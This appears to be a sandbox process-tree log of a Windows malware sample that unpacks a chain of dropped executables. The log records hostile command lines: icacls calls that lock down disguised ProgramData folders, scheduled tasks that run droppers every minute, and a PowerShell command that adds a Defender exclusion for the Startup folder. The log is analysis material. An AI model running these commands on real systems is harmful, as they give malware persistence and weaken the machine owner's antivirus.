C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:1760

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7548

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:7276

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5176

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6" /TR "C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:7344

C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6.exe
"C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:7568

C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\7896aff6884e71e105ced68d188c31f5303bc118de29596f1409c61d0b5f5196.exe"
1⤵
PID:5204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
2⤵
PID:6300

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4" /inheritance:e /deny "admin:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:5368

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:2804

C:\Windows\SysWOW64\icacls.exe
"C:\Windows\System32\icacls.exe" "C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
3⤵
- Modifies file permissions
PID:6620

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /CREATE /TN "USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4" /TR "C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4.exe" /SC MINUTE
3⤵
- Creates scheduled task(s)
PID:5856

C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4.exe
"C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4.exe" "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 132
2⤵
- Program crash
PID:6832

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap7751.exe
2⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\zap9196.exe
3⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\zap9710.exe
4⤵
PID:5596

C:\Users\Admin\AppData\Local\Temp\IXP038.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP038.TMP\tz9517.exe
5⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\IXP038.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP038.TMP\v4630nF.exe
5⤵
PID:5184

C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\w43kj59.exe
4⤵
PID:1520

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5508

C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP022.TMP\zap7751.exe
2⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\IXP045.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP045.TMP\zap9196.exe
3⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\IXP052.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP052.TMP\zap9710.exe
4⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\IXP067.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP067.TMP\tz9517.exe
5⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\IXP067.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP067.TMP\v4630nF.exe
5⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\IXP052.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP052.TMP\w43kj59.exe
4⤵
PID:6560

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\IXP030.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP030.TMP\zap7751.exe
2⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\IXP048.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP048.TMP\zap9196.exe
3⤵
PID:784

C:\Users\Admin\AppData\Local\Temp\IXP054.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP054.TMP\zap9710.exe
4⤵
PID:6204

C:\Users\Admin\AppData\Local\Temp\IXP057.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP057.TMP\tz9517.exe
5⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\IXP057.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP057.TMP\v4630nF.exe
5⤵
PID:6780

C:\Users\Admin\AppData\Local\Temp\IXP054.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP054.TMP\w43kj59.exe
4⤵
PID:7208

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\zap7751.exe
2⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\IXP033.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP033.TMP\zap9196.exe
3⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\IXP044.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP044.TMP\w43kj59.exe
4⤵
PID:8016

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5816

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\zap7751.exe
2⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\zap9196.exe
3⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\IXP035.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP035.TMP\zap9710.exe
4⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\IXP046.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP046.TMP\v4630nF.exe
5⤵
PID:5472

C:\Users\Admin\AppData\Local\Temp\IXP035.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP035.TMP\w43kj59.exe
4⤵
PID:7328

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\zap7751.exe
2⤵
PID:5268

C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\zap9196.exe
3⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\IXP056.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP056.TMP\zap9710.exe
4⤵
PID:5592

C:\Users\Admin\AppData\Local\Temp\IXP059.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP059.TMP\tz9517.exe
5⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\IXP059.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP059.TMP\v4630nF.exe
5⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\IXP056.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP056.TMP\w43kj59.exe
4⤵
PID:420

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\zap7751.exe
2⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\zap9196.exe
3⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\IXP031.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP031.TMP\zap9710.exe
4⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\IXP055.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP055.TMP\tz9517.exe
5⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\IXP055.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP055.TMP\v4630nF.exe
5⤵
PID:2332

C:\Users\Admin\AppData\Local\Temp\IXP031.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP031.TMP\w43kj59.exe
4⤵
PID:7492

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\IXP024.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP024.TMP\zap7751.exe
2⤵
PID:6240

C:\Users\Admin\AppData\Local\Temp\IXP064.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP064.TMP\zap9196.exe
3⤵
PID:6792

C:\Users\Admin\AppData\Local\Temp\IXP6B48.tmp\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP6B48.tmp\zap9710.exe
4⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\IXP069.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP069.TMP\tz9517.exe
5⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\IXP069.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP069.TMP\v4630nF.exe
5⤵
PID:6676

C:\Users\Admin\AppData\Local\Temp\IXP6B48.tmp\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP6B48.tmp\w43kj59.exe
4⤵
PID:7312

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zap7751.exe
2⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\zap9196.exe
3⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\zap9710.exe
4⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\IXP037.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP037.TMP\tz9517.exe
5⤵
PID:6800

C:\Users\Admin\AppData\Local\Temp\IXP037.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP037.TMP\v4630nF.exe
5⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP017.TMP\w43kj59.exe
4⤵
PID:4580

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5972

C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\zap7751.exe
2⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\IXP029.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP029.TMP\zap9196.exe
3⤵
PID:6500

C:\Users\Admin\AppData\Local\Temp\IXP042.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP042.TMP\w43kj59.exe
4⤵
PID:7656

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\IXP034.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP034.TMP\zap7751.exe
2⤵
PID:6684

C:\Users\Admin\AppData\Local\Temp\IXP058.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP058.TMP\zap9196.exe
3⤵
PID:6332

C:\Users\Admin\AppData\Local\Temp\IXP061.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP061.TMP\zap9710.exe
4⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\IXP065.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP065.TMP\v4630nF.exe
5⤵
PID:6644

C:\Users\Admin\AppData\Local\Temp\IXP061.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP061.TMP\w43kj59.exe
4⤵
PID:7340

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\zap7751.exe
2⤵
PID:1400

C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\zap9196.exe
3⤵
PID:5772

C:\Users\Admin\AppData\Local\Temp\IXP028.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP028.TMP\zap9710.exe
4⤵
PID:6452

C:\Users\Admin\AppData\Local\Temp\IXP040.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP040.TMP\v4630nF.exe
5⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\IXP028.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP028.TMP\w43kj59.exe
4⤵
PID:8112

C:\Users\Admin\AppData\Local\Temp\IXP533C.tmp\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP533C.tmp\zap7751.exe
1⤵
PID:5896

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:328

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\zap7751.exe
2⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\zap9196.exe
3⤵
PID:4456

C:\Users\Admin\AppData\Local\Temp\IXP032.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP032.TMP\zap9710.exe
4⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\IXP043.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP043.TMP\tz9517.exe
5⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\IXP043.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP043.TMP\v4630nF.exe
5⤵
PID:612

C:\Users\Admin\AppData\Local\Temp\IXP032.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP032.TMP\w43kj59.exe
4⤵
PID:3968

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5764

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\zap7751.exe
2⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\zap9196.exe
3⤵
PID:6852

C:\Users\Admin\AppData\Local\Temp\IXP063.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP063.TMP\zap9710.exe
4⤵
PID:7040

C:\Users\Admin\AppData\Local\Temp\IXP6BC5.tmp\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP6BC5.tmp\tz9517.exe
5⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\IXP6BC5.tmp\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP6BC5.tmp\v4630nF.exe
5⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\IXP063.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP063.TMP\w43kj59.exe
4⤵
PID:3932

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\IXP036.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP036.TMP\zap7751.exe
2⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\IXP051.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP051.TMP\zap9196.exe
3⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\IXP062.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP062.TMP\zap9710.exe
4⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\IXP066.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP066.TMP\tz9517.exe
5⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\IXP066.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP066.TMP\v4630nF.exe
5⤵
PID:6516

C:\Users\Admin\AppData\Local\Temp\IXP062.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP062.TMP\w43kj59.exe
4⤵
PID:4104

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\IXP060.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP060.TMP\zap7751.exe
2⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\IXP068.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP068.TMP\zap9196.exe
3⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\IXP070.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP070.TMP\zap9710.exe
4⤵
PID:7068

C:\Users\Admin\AppData\Local\Temp\IXP071.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP071.TMP\tz9517.exe
5⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\IXP071.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP071.TMP\v4630nF.exe
5⤵
PID:6356

C:\Users\Admin\AppData\Local\Temp\IXP070.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP070.TMP\w43kj59.exe
4⤵
PID:7436

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:5272

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\zap7751.exe
2⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP021.TMP\zap9196.exe
3⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\IXP026.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP026.TMP\w43kj59.exe
4⤵
PID:5280

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4.exe"
1⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\zap7751.exe
C:\Users\Admin\AppData\Local\Temp\IXP025.TMP\zap7751.exe
2⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\IXP041.TMP\zap9196.exe
C:\Users\Admin\AppData\Local\Temp\IXP041.TMP\zap9196.exe
3⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\IXP047.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP047.TMP\zap9710.exe
4⤵
PID:1800

C:\Users\Admin\AppData\Local\Temp\IXP053.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP053.TMP\tz9517.exe
5⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\IXP053.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP053.TMP\v4630nF.exe
5⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\IXP047.TMP\w43kj59.exe
C:\Users\Admin\AppData\Local\Temp\IXP047.TMP\w43kj59.exe
4⤵
PID:608

C:\Users\Admin\AppData\Local\Temp\IXP026.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP026.TMP\zap9710.exe
1⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\IXP039.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP039.TMP\tz9517.exe
2⤵
PID:6836

C:\Users\Admin\AppData\Local\Temp\IXP039.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP039.TMP\v4630nF.exe
2⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\IXP040.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP040.TMP\tz9517.exe
1⤵
PID:6908

C:\Users\Admin\AppData\Local\Temp\IXP046.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP046.TMP\tz9517.exe
1⤵
PID:7160

C:\Users\Admin\AppData\Local\Temp\IXP044.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP044.TMP\zap9710.exe
1⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\IXP050.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP050.TMP\tz9517.exe
2⤵
PID:5604

C:\Users\Admin\AppData\Local\Temp\IXP050.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP050.TMP\v4630nF.exe
2⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\IXP042.TMP\zap9710.exe
C:\Users\Admin\AppData\Local\Temp\IXP042.TMP\zap9710.exe
1⤵
PID:6984

C:\Users\Admin\AppData\Local\Temp\IXP049.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP049.TMP\tz9517.exe
2⤵
PID:6224

C:\Users\Admin\AppData\Local\Temp\IXP049.TMP\v4630nF.exe
C:\Users\Admin\AppData\Local\Temp\IXP049.TMP\v4630nF.exe
2⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\IXP065.TMP\tz9517.exe
C:\Users\Admin\AppData\Local\Temp\IXP065.TMP\tz9517.exe
1⤵
PID:6100

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:228

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
2⤵
PID:4972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4512

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:6292

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
2⤵
- Creates scheduled task(s)
PID:3900

C:\ProgramData\OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9.exe
C:\ProgramData\OracleAdobe-type5.0.3.9\OracleAdobe-type5.0.3.9.exe
1⤵
PID:6472

C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4.exe
C:\ProgramData\WindowsHolographicDevicesUSOPrivate-type9.8.5.4\WindowsHolographicDevicesUSOPrivate-type9.8.5.4.exe
1⤵
PID:1492

C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe
C:\ProgramData\DesktopWindowsHolographicDevices-type1.9.4.9\DesktopWindowsHolographicDevices-type1.9.4.9.exe
1⤵
PID:7276

C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4.exe
C:\ProgramData\USOPrivateSoftwareDistribution-type8.6.7.4\USOPrivateSoftwareDistribution-type8.6.7.4.exe
1⤵
PID:7668

C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6.exe
C:\ProgramData\MicrosoftSoftwareDistribution-type3.6.6.6\MicrosoftSoftwareDistribution-type3.6.6.6.exe
1⤵
PID:3784

